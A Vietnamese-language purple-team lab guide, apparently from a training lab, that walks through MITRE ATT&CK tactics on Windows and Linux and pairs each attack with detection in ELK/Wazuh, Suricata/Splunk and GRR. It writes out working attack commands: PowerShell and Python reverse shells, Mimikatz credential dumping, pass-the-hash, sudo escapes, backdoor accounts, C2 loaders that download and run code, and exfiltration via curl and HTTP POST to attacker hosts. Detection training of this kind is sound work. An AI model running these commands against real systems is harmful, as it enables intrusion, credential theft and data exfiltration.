Web Caldera Rò rỉ T1020 Rò rỉ Tự động N/A

TTP được thực hiện/bao gồm trong nền tảng LINUX

CHIẾN THUẬT ID Kỹ thuật Tên Kỹ thuật Tên Kỹ thuật phụ Truy cập Ban đầu T1133 Dịch vụ Từ xa Bên ngoài N/A Thực thi T1059 / ST: 004 Thông dịch Lệnh và Kịch bản Shell Unix Duy trì T1136 / ST: 001 Tạo Tài khoản Tài khoản Cục bộ Nâng cao Đặc quyền T1548 / ST:003 Lạm dụng Cơ chế Kiểm soát Nâng cao Sudo và Bộ nhớ đệm Sudo Trốn tránh Phòng thủ T1222 / ST:002 Sửa đổi Quyền Tệp & Thư mục Sửa đổi Quyền Tệp và Thư mục Linux và Mac Truy cập Thông tin xác thực T1003 / ST:008 Dump Thông tin xác thực HĐH /etc/passwd và /etc/shadow Khám phá T1046 Quét Dịch vụ Mạng N/A Di chuyển Ngang T1021 / ST: 004 Dịch vụ Từ xa SSH Thu thập T1005 Dữ liệu từ Hệ thống Cục bộ N/A Điều khiển và Chỉ huy T1071 / ST: 001 Giao thức Lớp Ứng dụng Giao thức Web Caldera Rò rỉ T1048 Rò rỉ Qua Giao thức Thay thế N/A

1. TRUY CẬP BAN ĐẦU 1.1 Truy cập Ban đầu Windows [Dịch vụ Từ xa Bên ngoài – T1133] 1.1.A Tấn công [Brute-Force Dịch vụ WinRM (PS Remoting)]: –

• PS Remoting với Đăng nhập Thất bại: powershell -ep bypass $UserName = ‘cyberwarfare\emp1’ $Password = ‘Wrong_Password’ $securepassword = ConvertTo-SecureString $Password -AsPlainText -Force $pscredentials = New-Object System.Management.Automation.PSCredential ($UserName, $securepassword) $sess = New-Pssession -ComputerName 10.10.10.5 -Credential $pscredentials –Verbose
• PS Remoting với Đăng nhập Thành công: powershell -ep bypass $UserName = ‘cyberwarfare\emp1’ $Password = ‘Serious@963’ $securepassword = ConvertTo-SecureString $Password -AsPlainText -Force $pscredentials = New-Object System.Management.Automation.PSCredential ($UserName, $securepassword) $sess = New-Pssession -ComputerName 10.10.10.5 -Credential $pscredentials –Verbose

1.1.B Phát hiện: – Phát hiện Brute-Force Dịch vụ Từ xa bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0017 Hệ thống Mồi nhử/Người dùng Mồi nhử

• Phát hiện Đăng nhập Thất bại: [Hình ảnh phát hiện đăng nhập thất bại]
• Phát hiện Đăng nhập Thành công: [Hình ảnh phát hiện đăng nhập thành công]

1.2 Truy cập Ban đầu Linux [Dịch vụ Từ xa Bên ngoài – T1133] 1.2.A Tấn công [Brute-Forcing SSH]: –

• SSH với Đăng nhập Thất bại: ssh emp1@CYBERWARFARE.CORP@10.10.10.6
• SSH với Đăng nhập Thành công: ssh emp1@CYBERWARFARE.CORP@10.10.10.6 Password: Wrong_Password Password: Serious@963

1. TRUY CẬP BAN ĐẦU 1.2.B Phát hiện: – Phát hiện Brute-Force Dịch vụ Từ xa bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0017 Hệ thống Mồi nhử

• Phát hiện Đăng nhập Thất bại: [Hình ảnh phát hiện đăng nhập thất bại]
• Phát hiện Đăng nhập Thành công: [Hình ảnh phát hiện đăng nhập thành công]

1. Vượt qua Kiểm soát Bảo mật
2. Thực thi Shell Đảo ngược PowerShell
3. Shell Đảo ngược từ Windows-Machine
4. Thực thi lệnh Shell Đảo ngược Python/Bash
5. Thực thi Lệnh Đảo ngược Python/Bash
6. Shell Đảo ngược từ Linux-Machine Phát hiện Kết nối được khởi tạo bởi shell-đảo ngược trên ELK Thiết lập kết nối với máy chủ C2 Phát hiện bằng phân tích PCAP trên Network Traffic Analysis Phát hiện Kịch bản Kết nối Đảo ngược PowerShell trên ELK
7. THỰC THI 2.1 Thực thi Windows [Dịch vụ Từ xa Bên ngoài – T1059.001] 2.1.A Tấn công [Thông dịch Lệnh và Kịch bản (PowerShell)]: –

• Máy Kẻ tấn công:
• Trên Máy bị Xâm phạm (employee-machine): nc –nlvp 4443 $client = New-Object System.Net.Sockets.TCPClient(‘192.168.150.4’,4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + ‘PS ‘ + (pwd).Path + ‘> ‘;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

2.1.B Phát hiện: – Phát hiện Thực thi Mã Shell bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] & Phân tích Lưu lượng Phòng thủ Chủ động – DTE0036 (Thao túng Phần mềm)

• Phát hiện Kịch bản PowerShell cho Shell Đảo ngược bởi HIDS [Hình ảnh phát hiện kịch bản PowerShell]
• Phát hiện Kết nối Đảo ngược bằng Phân tích Mạng [Hình ảnh phát hiện kết nối đảo ngược]

2.2 Thực thi Linux [Dịch vụ Từ xa Bên ngoài – T1059.004] 2.2.A Tấn công [Thông dịch Lệnh và Kịch bản (Shell Unix)]: –

• Máy Kẻ tấn công: nc –nlvp 7777
• Trên Máy bị Xâm phạm (Employee-RL1):

2. THỰC THI python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.150.4,7777));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

2.2.B Phát hiện: – Phát hiện Thực thi Mã Shell bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] & Phân tích Lưu lượng Phòng thủ Chủ động – DTE0036 (Thao túng Phần mềm)

• Phát hiện Kịch bản Python cho Shell Đảo ngược bởi HIDS [Hình ảnh phát hiện kịch bản Python]
• Phát hiện Kết nối Đảo ngược bằng Phân tích Mạng [Hình ảnh phát hiện kết nối đảo ngược]

1. Thực thi Tự động Khởi động hoặc Đăng nhập
2. Tạo Tài khoản Người dùng a. Phát hiện – Thêm người dùng để duy trì c. Phát hiện Sửa đổi Registry trên ELK

3.1 Duy trì Windows [Thực thi Tự động Khởi động hoặc Đăng nhập – T1547.001] 3.1.A Tấn công: – Sửa đổi Registry 1.1 Sửa đổi giá trị Registry để duy trì reg add “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce” /v Pentestlab /t REG_SZ /d “C:\Temp\lab.exe”

3. DUY TRÌ 3.1.B Phát hiện: – Phát hiện Sửa đổi Registry bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0006 (Xác định Đường cơ sở cho quản lý Registry) [Hình ảnh phát hiện sửa đổi Registry]

3.2.1 Duy trì Linux [Tạo Tài khoản – T1136.001] 3.2.A Tấn công: – Tạo Tài khoản 1.1 Thêm Người dùng để duy trì useradd -p $(openssl passwd -1 password) support_388945a1

3. DUY TRÌ 3.2.B Phát hiện: – Phát hiện thêm người dùng mới để duy trì bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0006 (Xác định Đường cơ sở cho quản lý Registry) [Hình ảnh phát hiện thêm người dùng mới]
4. Tạo hoặc Sửa đổi Quy trình Hệ thống
5. Lạm dụng Cơ chế Kiểm soát Nâng cao a. Phát hiện lạm dụng ‘sudo’ để nâng cao đặc quyền

b. Phát hiện thao túng Dịch vụ trên ELK + WAZUH (HIDS)

Tạo hoặc Sửa đổi Quy trình Hệ thống sc.exe config snmptrap binpath= “net localgroup Administrators cyberwarfare\empX /add” sc.exe stop snmptrap sc.exe start snmptrap <đăng xuất> <sau đó đăng nhập lại>

4. NÂNG CAO ĐẶC QUYỀN 4.1 Nâng cao Đặc quyền Windows [Tạo hoặc Sửa đổi Quy trình Hệ thống – T1543.003] 4.1.A Tấn công: –

4.1.B Phát hiện: – Phát hiện thao túng dịch vụ bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0032 (Kiểm soát Bảo mật) [Hình ảnh phát hiện thao túng dịch vụ]

4.2 Thực thi: – Nâng cao Đặc quyền Linux [Lạm dụng Cơ chế Kiểm soát Nâng cao T1548.003] 4.2.B Tấn công: – Lạm dụng Cơ chế Kiểm soát Nâng cao sudo -l sudo /tmp/vi Esc + :!/bin/bash (được cấp quyền root)

4. NÂNG CAO ĐẶC QUYỀN 4.2.B Phát hiện: – Phát hiện lạm dụng ‘sudo’ bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0032 (Kiểm soát Bảo mật) [Hình ảnh phát hiện lạm dụng sudo]
5. Sửa đổi Quyền Tệp & Thư mục (Linux)
6. Sửa đổi Quyền Tệp & Thư mục (Windows) a. Phát hiện Thao túng Mục Kiểm soát Truy cập Tệp/Thư mục. b. Phát hiện sửa đổi quyền Tệp/Thư mục (Lạm dụng ACL)

5.1 Trốn tránh Phòng thủ Windows [Sửa đổi Quyền Tệp & Thư mục – T1222.001] 5.1.A Tấn công : – Trốn tránh kiểm soát phòng thủ bằng cách thay đổi Kiểm soát Truy cập. icacls . /grant Everyone:F /T /C /Q

5. TRỐN TRÁNH PHÒNG THỦ 5.1.B Phát hiện: – Phát hiện Thao túng Kiểm soát Truy cập bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0030 (Rác Bỏ túi) [Hình ảnh phát hiện thao túng kiểm soát truy cập]

5.2 Trốn tránh Phòng thủ Linux [Sửa đổi Quyền Tệp & Thư mục – T1222.002] 5.2.A Tấn công: – Sửa đổi Quyền Tệp và Thư mục: – cd /opt/sensitive chmod 777 /opt/sensitive cat read.txt

5. TRỐN TRÁNH PHÒNG THỦ 5.2.B Phát hiện: – Phát hiện lạm dụng quyền tệp/thư mục bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0030 (Rác Bỏ túi) [Hình ảnh phát hiện lạm dụng quyền tệp/thư mục]
6. Dump Thông tin xác thực HĐH (Bộ nhớ LSASS) b. Phát hiện thực thi kịch bản PS Mimikatz bằng ELK + WAZUH a. Phát hiện dump tệp shadow & passwd
7. Dump Thông tin xác thực HĐH (tệp passwd & shadow)

6.1 Truy cập Thông tin xác thực Windows [Dump Thông tin xác thực HĐH – T1003.001] 6.1.A Tấn công : – Dump Thông tin xác thực HĐH: –

1. Tải xuống Kịch bản Dump Thông tin xác thực từ Máy chủ Payload: iwr –usebasicparsing http://192.168.250.100/Invoke-Mimikatz.ps1 -OutFile Invoke- Mimikatz.ps1
2. Thực thi kịch bản Dump Thông tin xác thực trên máy bị xâm phạm: .\Invoke-Mimikatz.ps1 Invoke-Mimikatz -verbose
3. TRUY CẬP THÔNG TIN XÁC THỰC 6.1.B Phát hiện: – Phát hiện kịch bản dump thông tin xác thực bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0012 (Thông tin xác thực Mồi nhử) [Hình ảnh phát hiện kịch bản dump thông tin xác thực]

6.2 Truy cập Thông tin xác thực Linux [Dump Thông tin xác thực HĐH – T1003.008] 6.2.A Tấn công: – Dump tệp /etc/shadow & /etc/passwd: – unshadow /etc/passwd /etc/shadow > /tmp/crack.password.db

6. TRUY CẬP THÔNG TIN XÁC THỰC 6.2.B Phát hiện: – Phát hiện dump thông tin xác thực bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0012 (Thông tin xác thực Mồi nhử) [Hình ảnh phát hiện dump thông tin xác thực]
7. Khám phá Tin cậy Miền
8. Quét Dịch vụ Mạng
9. Truy vấn LDAP Độc hại
10. Khám phá Mạng Nội bộ a. Phát hiện khám phá thông tin miền b. Phát hiện kết nối TCP được khởi tạo bằng Network Analyzer c. Phân tích Lưu lượng Mạng Windows Server

7.1 Khám phá Windows [Khám phá Tin cậy Miền – T1482] 7.1.A Tấn công: – Khám phá Người dùng Miền: net user /domain Khám phá Nhóm Miền: net group «Domain Admins» /domain

7. KHÁM PHÁ 7.1.B Phát hiện: – Phát hiện khám phá thông tin miền bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0014 (Mạng Mồi nhử) – DTE 0012 (Thông tin xác thực Mồi nhử) [Hình ảnh phát hiện khám phá thông tin miền]

7.2 Khám phá Linux [Quét Dịch vụ Mạng – T1046] 7.2.A Tấn công: – Khám phá Dịch vụ Mạng Nội bộ: nmap -sC 10.10.10.0/24 –top-ports 5

7. KHÁM PHÁ 7.2.B Phát hiện: – Phát hiện Kết nối Mạng được khởi tạo bằng Giám sát Lưu lượng Mạng Phòng thủ Chủ động – DTE0036 (Thao túng Phần mềm) – DTE 0012 (Hệ thống Mồi nhử) [Hình ảnh phát hiện kết nối mạng]
8. Tài liệu Xác thực Thay thế
9. Khai thác Dịch vụ Truy cập Từ xa
10. Tấn công Replay Thông tin xác thực (Pass the Hash/ Pass the Ticket)
11. Chuyển tiếp Cổng SSH Từ xa/Cục bộ b. Phát hiện Kết nối Dịch vụ SSH Từ xa để Di chuyển Ngang Bộ điều khiển Miền Máy chủ Linux a. Phát hiện Thực thi Mã Từ xa thông qua WMI

8.1 Di chuyển Ngang Windows [Sử dụng Tài liệu Xác thực Thay thế – T1550.002] 8.1.A Tấn công: – Sử dụng Tài liệu Xác thực Thay thế 1.1) Tải xuống Kịch bản Di chuyển Ngang từ Máy chủ Payload: iwr –usebasicparsing http://192.168.250.100/Invoke-WMIExec.ps1 -OutFile Invoke-WMIExec.ps1 1.2) Thực thi Tấn công Di chuyển Ngang trên Bộ điều khiển Miền bằng Pass-the-Hash (PTH): Invoke-WMIExec -Target 10.10.10.2 -Domain cyberwarfare -Username administrator -Hash 03D1BBD771D9D72827199B9F815635AB -Command “notepad.exe” -verbose

8. DI CHUYỂN NGANG

• Phát hiện: – Phát hiện Tấn công Di chuyển Ngang bằng Advance Threat Analytics [ATA] Phòng thủ Chủ động – DTE0007 (Phân tích Hành vi) [Hình ảnh phát hiện tấn công di chuyển ngang]

8.2 Di chuyển Ngang Linux [Dịch vụ Từ xa – T1021.004] 8.2.A Tấn công: – Truy cập máy từ xa bằng cách lạm dụng Dịch vụ Từ xa (SSH): – ssh –D 9999 emp1@CYBERWARFARE.CORP@10.10.10.3 Pass: Serious@963

8. DI CHUYỂN NGANG 8.2.B Phát hiện: – Phát hiện Kết nối SSH bằng Giám sát Mạng Phòng thủ Chủ động – DTE0027 (Giám sát Mạng) [Hình ảnh phát hiện kết nối SSH]

b. Phát hiện khám phá tệp nhạy cảm trong Linux bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)]

1. Thu thập Dữ liệu từ Hệ thống Cục bộ
2. Thu thập Dữ liệu từ Hệ thống Cục bộ a. Phát hiện truy vấn registry bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)]

9.1 Thu thập Dữ liệu Windows [Dữ liệu từ Hệ thống Cục bộ – T1005] 9.1.A Thực thi: – Thu thập mật khẩu từ registry: – reg query “HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon”

9. THU THẬP DỮ LIỆU 9.1.B Phát hiện: – Phát hiện truy vấn registry bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0030 – Rác Bỏ túi [Hình ảnh phát hiện truy vấn registry]

9.2 Thu thập Dữ liệu Linux [Dữ liệu từ Hệ thống Cục bộ – T1005] 9.2.A Tấn công: – Dữ liệu từ Hệ thống Cục bộ- find / -maxdepth 4 -name ‘*.conf’ -type f -exec grep -Hn ‘pass|password|login|username|email|mail|host|ip’ {} ; 2>/dev/null

9. THU THẬP DỮ LIỆU 9.2.B Phát hiện: – Phát hiện khám phá tệp nhạy cảm bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0030 – Rác Bỏ túi [Hình ảnh phát hiện khám phá tệp nhạy cảm]
10. Thu thập Dữ liệu từ Hệ thống Cục bộ (LINUX)
11. Thu thập Dữ liệu từ Hệ thống
12. Cục bộ (WINDOWS) 2. Giao thức Web Điều khiển & Chỉ huy (LINUX) 2. Giao thức Web Điều khiển & Chỉ huy (WINDOWS) LINUX WINDOWS c. Phát hiện giao tiếp Mạng bên ngoài b. Phát hiện giao tiếp beacon C2 bằng Network Traffic Monitor
13. 10.1 Điều khiển & Chỉ huy Windows [Giao thức Lớp Ứng dụng – T1071.001] 10.1.A Tấn công: – Giao tiếp Mạng máy chủ C2 Caldera: $server=”http://192.168.250.12:8888″;$url=”$server/file/download”;$wc=New-Object System.Net.WebClient;$wc.Headers.add(“platform”,”windows”);$wc.Headers.add(“file”,”sandcat .go”);$data=$wc.DownloadData($url);$name=$wc.ResponseHeaders[“Content- Disposition”].Substring($wc.ResponseHeaders[“Content- Disposition”].IndexOf(“filename=”)+9).Replace(“`””,””);get-process | ? {$_.modules.filename -like “C:\Users\Public$name.exe”} | stop-process -f;rm -force “C:\Users\Public$name.exe” -ea ignore;[io.file]::WriteAllBytes(“C:\Users\Public$name.exe”,$data) | Out-Null;Start- Process -FilePath C:\Users\Public$name.exe -ArgumentList “-server $server -group red” – WindowStyle hidden;
14. ĐIỀU KHIỂN VÀ CHỈ HUY 10.1.B Phát hiện: – Phát hiện thực thi beacon C2 bằng Giám sát Tấn công dựa trên Máy chủ [ELK + Wazuh (HIDS)] Phòng thủ Chủ động – DTE0027 – Giám sát Mạng [Hình ảnh phát hiện thực thi beacon C2]
15. 10.2 Điều khiển & Chỉ huy Linux [Giao thức Lớp Ứng dụng – T1071.001] 10.2.A Tấn công: – Giao tiếp Mạng máy chủ C2 Caldera: server=”http://192.168.250.12:8888″;curl -s -X POST -H “file:sandcat.go” -H “platform:linux” $server/file/download > sandcat.go;chmod +x sandcat.go;./sandcat.go – server $server -group red -v
16. ĐIỀU KHIỂN VÀ CHỈ HUY 10.2.B Phát hiện: – Phát hiện giao tiếp beacon C2 bằng Network Traffic Monitor Phòng thủ Chủ động – DTE0027 – Giám sát Mạng [Hình ảnh phát hiện giao tiếp beacon C2]
17. Phát hiện giao tiếp Mạng bên ngoài bằng Giám sát tấn công dựa trên Mạng [SPLUNK+ SURICATA (NIDS)] [Hình ảnh phát hiện giao tiếp mạng bên ngoài]
18. Rò rỉ Dữ liệu (LINUX)
19. Rò rỉ Dữ liệu (WINDOWS)
20. Giao thức Web Điều khiển & Chỉ huy (LINUX)
21. Giao thức Web Điều khiển & Chỉ huy (LINUX) b. Phát hiện địa chỉ IP máy chủ C2 rò rỉ dữ liệu bằng SPLUNK + SURICATA [NIDS] a. Phát hiện Rò rỉ Dữ liệu bằng phân tích gói tin
22. 11.1 Rò rỉ Dữ liệu Windows [Rò rỉ Tự động – T1020] 11.1.A Tấn công: – Rò rỉ Tự động: – Bước 1: Trên máy Kẻ tấn công, bắt đầu lắng nghe bằng ‘netcat’ nc64.exe -nlvp 4445 Bước 2: Trên Máy Nạn nhân $file = Get-Content C:\Users\priv\Documents\file.txt $key = (New-Object System.Text.ASCIIEncoding).GetBytes(“FEZjEGYbbcyXQHgbZFAbgf94r”) $securestring = new-object System.Security.SecureString foreach ($char in $file.toCharArray()) { $secureString.AppendChar($char) } $encryptedData = ConvertFrom-SecureString -SecureString $secureString -Key $key Bước 3: Yêu cầu POST từ Máy Nạn nhân: Invoke-WebRequest -Uri http://192.168.150.4 -Method POST -Body $encryptedData
23. RÒ RỈ DỮ LIỆU 11.1.B Phát hiện: – Phòng thủ Chủ động – DTE0028 (Thu thập PCAP) – DTE0031 (Bộ giải mã Giao thức) Phát hiện dữ liệu bị rò rỉ bằng Phân tích Gói tin [Network Monitor] [Hình ảnh phát hiện dữ liệu bị rò rỉ]
24. 11.2 Rò rỉ Dữ liệu Linux [Rò rỉ Qua Giao thức Thay thế – T1048] 11.2.B Tấn công: – Rò rỉ qua Giao thức Thay thế (HTTP): – curl –d ‘data=sensitivedata’ http://192.168.250.12:8888/data
25. RÒ RỈ DỮ LIỆU 11.2.B Phát hiện: – Phòng thủ Chủ động – DTE0026 ( Thao túng Mạng ) Phát hiện địa chỉ IP máy chủ C2 rò rỉ dữ liệu bằng SPLUNK + SURICATA [NIDS] [Hình ảnh phát hiện địa chỉ IP máy chủ C2]
26. Thực hiện Săn lùng Mối đe dọa trên máy bị xâm phạm. (Giám sát Quy trình/Mạng v.v.) bằng Google Rapid Response [GRR] ĐIỀU TRA SỐ & ỨNG PHÓ SỰ CỐ [Hình ảnh minh họa săn lùng mối đe dọa]
27. Thu thập bằng chứng pháp y từ máy bị xâm phạm (Tệp nhị phân Độc hại, Beacon C2 v.v.) bằng Google Rapid Response [GRR] ĐIỀU TRA SỐ & ỨNG PHÓ SỰ CỐ [Hình ảnh minh họa thu thập bằng chứng]

Cyberwarfare